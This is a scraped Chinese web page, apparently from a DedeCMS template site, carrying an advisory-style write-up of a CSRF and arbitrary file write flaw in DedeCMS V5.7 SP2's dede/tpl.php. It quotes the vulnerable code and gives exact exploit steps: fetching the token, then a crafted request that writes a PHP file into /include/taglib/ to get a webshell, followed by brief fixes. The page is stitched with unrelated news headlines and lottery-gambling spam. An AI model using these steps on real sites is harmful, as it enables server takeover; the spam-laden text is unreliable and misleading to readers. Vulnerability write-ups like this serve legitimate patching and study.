• 人民网评:异地医保的步子还需更大一些 2019-07-18
  • 敢想敢拼的邹市明:用奥运精神助推青少年体育事业发展 2019-07-13
  • 改革开放40年——从全国糖酒会看酒业跌宕起伏酒业 中国 2019-07-13
  • 这三个史无前例,让美国有点懵了 2019-07-11
  • 文创大咖齐聚成都 共话“一带一路”文化交流 2019-07-06
  • 农历五月初二 唐代高僧雪峰义存禅师圆寂纪念日 2019-07-06
  • 山西与腾讯公司签署战略合作协议 2019-07-04
  • 山西:“四好农村路” 致富添门路 2019-07-02
  • 【专题】社会主义核心价值观主题微电影优秀作品展示 2019-07-02
  • 《钟馗捉妖记》杨旭文为魔族惨烈“献身” 2019-06-10
  • 个税法迎第七次大修 起征点由每月3500元提高至5000元 2019-06-10
  • 摄影师捕捉超强EF3龙卷风 巨大云团画面惊险壮观 2019-05-26
  • 农民夜校成十九大精神宣讲重要课堂 2019-05-25
  • 拆迁款分配引冲突 儿子推倒八旬老父致其死亡 2019-05-25
  • 2017年邵逸夫奖在港颁奖 5位科学家获此殊荣 2019-05-23
  • 代理加盟 2019全新代理计划 赚钱+省钱双管齐下,独立平台,丰厚利润!

    您现在的位置: 11选5任四包赚不赔40注 > 织梦大学 > 织梦安全 >

    体彩11选5最聪明的玩法:dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

    来源:未知 发布时间:2019-04-02热度: ℃我要评论
    DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,存在CSRF漏洞,通过申请友情链接的方式,诱使管理员点击,从而从 Referer 中拿到 后台路径,进而以管理员的身份写一句话到服务器上 GetShell 。...

    11选5任四包赚不赔40注 www.zo-n.com 织梦模板秀站淘宝店开业,好礼送不停

    DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。笔者是2018年2月28日在官网下载的DedeCMS V5.7 SP2版本程序,截至发稿,漏洞依然存在。

    漏洞详情

    织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。

    dede/tpl.php中第251行到281行

     

    csrf_check();

     

    if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))

     

    {

     

        ShowMsg('文件名不合法,不允许进行操作!', '-1');

     

        exit();

     

    }

     

    require_once(DEDEINC.'/oxwindow.class.php');

     

    $tagname = preg_replace("#\.lib\.php$#i", "", $filename);

     

    $content = stripslashes($content);

     

    $truefile = DEDEINC.'/taglib/'.$filename;

     

    $fp = fopen($truefile, 'w');

     

    fwrite($fp, $content);

     

    fclose($fp);

     

    1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。

    2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。

    注意: 这里还有一个csrf_check()函数,即请求中必须要带token参数。

    漏洞利用

    1.首先获取token 访问 域名 + /dede/tpl.php?action=upload。在页面源代码中获取到token值 

    dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

    然后访问 :

    域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

    dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

    shell:域名 + /include/taglib/moonsec.lib.php

    漏洞修复

    1.禁止/include/taglib/此处写入文件。

    2.过滤恶意标签

    3.删除dede/tpl.php 文件

    本文地址://www.zo-n.com/dedecms_aq/1616.html

      发表评论

      评论列表(条)

      • 人民网评:异地医保的步子还需更大一些 2019-07-18
      • 敢想敢拼的邹市明:用奥运精神助推青少年体育事业发展 2019-07-13
      • 改革开放40年——从全国糖酒会看酒业跌宕起伏酒业 中国 2019-07-13
      • 这三个史无前例,让美国有点懵了 2019-07-11
      • 文创大咖齐聚成都 共话“一带一路”文化交流 2019-07-06
      • 农历五月初二 唐代高僧雪峰义存禅师圆寂纪念日 2019-07-06
      • 山西与腾讯公司签署战略合作协议 2019-07-04
      • 山西:“四好农村路” 致富添门路 2019-07-02
      • 【专题】社会主义核心价值观主题微电影优秀作品展示 2019-07-02
      • 《钟馗捉妖记》杨旭文为魔族惨烈“献身” 2019-06-10
      • 个税法迎第七次大修 起征点由每月3500元提高至5000元 2019-06-10
      • 摄影师捕捉超强EF3龙卷风 巨大云团画面惊险壮观 2019-05-26
      • 农民夜校成十九大精神宣讲重要课堂 2019-05-25
      • 拆迁款分配引冲突 儿子推倒八旬老父致其死亡 2019-05-25
      • 2017年邵逸夫奖在港颁奖 5位科学家获此殊荣 2019-05-23
      • 新时时彩2码有多少注 昨天双色球中出的号码是多少钱 极速十一选五网站 内蒙古时时彩开奖单2 中国七乐彩走势图 123期码报开奖结果 体彩p5开奖走势图 天津时时彩有实体店吗 安徽25选5开奖号码 足彩14场胜负14013斯 广西十一选五历史开奖结果 黑龙江时时彩开奖公告 乐透码 上海天天彩选4软件 韩国二分彩官网